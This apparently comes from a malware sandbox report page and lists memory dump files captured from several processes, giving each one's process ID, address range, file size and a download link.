memory/2192-299-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp

Filesize
12.7MB

Download
memory/2192-302-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp

Filesize
12.7MB

Download
memory/2408-305-0x00000215FCA90000-0x00000215FCAB0000-memory.dmp

Filesize
128KB

Download
memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/2408-293-0x00000215FCA50000-0x00000215FCA90000-memory.dmp

Filesize
256KB

Download
memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/2408-290-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/2408-291-0x00000215FC8D0000-0x00000215FC8F0000-memory.dmp

Filesize
128KB

Download
memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/2408-309-0x00000215FCA90000-0x00000215FCAB0000-memory.dmp

Filesize
128KB

Download
memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp

Filesize
8.0MB

Download
memory/3292-279-0x0000023EC7780000-0x0000023EC7790000-memory.dmp

Filesize
64KB

Download
memory/3292-280-0x0000023EC7780000-0x0000023EC7790000-memory.dmp

Filesize
64KB

Download
memory/3292-281-0x00007FF4BBD90000-0x00007FF4BBDA0000-memory.dmp

Filesize
64KB

Download
memory/3292-283-0x0000023EC7789000-0x0000023EC778F000-memory.dmp

Filesize
24KB

Download
memory/3420-250-0x000002302EE90000-0x000002302EE9A000-memory.dmp

Filesize
40KB

Download
memory/3420-234-0x0000023014B90000-0x0000023014BA0000-memory.dmp

Filesize
64KB

Download
memory/3420-253-0x000002302EED0000-0x000002302EED6000-memory.dmp

Filesize
24KB

Download
memory/3420-252-0x000002302EEA0000-0x000002302EEA8000-memory.dmp

Filesize
32KB

Download
memory/3420-251-0x000002302EEF0000-0x000002302EF0A000-memory.dmp

Filesize
104KB

Download
memory/3420-249-0x00007FF465A70000-0x00007FF465A80000-memory.dmp

Filesize
64KB

Download
memory/3420-254-0x000002302EEE0000-0x000002302EEEA000-memory.dmp

Filesize
40KB

Download
memory/3420-247-0x000002302EEB0000-0x000002302EECC000-memory.dmp

Filesize
112KB

Download
memory/3420-246-0x000002302ED40000-0x000002302ED4A000-memory.dmp

Filesize
40KB

Download
memory/3420-245-0x000002302EC60000-0x000002302EC7C000-memory.dmp

Filesize
112KB

Download
memory/3420-235-0x0000023014B90000-0x0000023014BA0000-memory.dmp

Filesize
64KB

Download
memory/3604-210-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3604-209-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3604-292-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3604-212-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3604-223-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3604-211-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3604-248-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp

Filesize
12.7MB

Download
memory/3616-153-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/3616-152-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/3616-151-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/3616-154-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/3616-193-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/3616-155-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/3616-187-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp

Filesize
12.7MB

Download
memory/4920-336-0x000001DD1C470000-0x000001DD1C480000-memory.dmp

Filesize
64KB

Download
memory/4920-337-0x000001DD1C470000-0x000001DD1C480000-memory.dmp

Filesize
64KB

Download
memory/4920-338-0x000001DD1C470000-0x000001DD1C480000-memory.dmp

Filesize
64KB

Download
memory/4944-311-0x00007FF6E8D30000-0x00007FF6E8D46000-memory.dmp

Filesize
88KB

Download
memory/4944-294-0x00007FF6E8D30000-0x00007FF6E8D46000-memory.dmp

Filesize
88KB

Download
memory/5064-199-0x000001D665DE0000-0x000001D665DF0000-memory.dmp

Filesize
64KB

Download
memory/5064-206-0x000001D665DE0000-0x000001D665DF0000-memory.dmp

Filesize
64KB

Download
memory/5064-200-0x000001D665DE0000-0x000001D665DF0000-memory.dmp

Filesize
64KB

Download
memory/5068-188-0x000002E966BE0000-0x000002E966BF0000-memory.dmp

Filesize
64KB

Download
memory/5068-189-0x000002E966BE0000-0x000002E966BF0000-memory.dmp

Filesize
64KB

Download
memory/5068-190-0x000002E966BE0000-0x000002E966BF0000-memory.dmp

Filesize
64KB

Download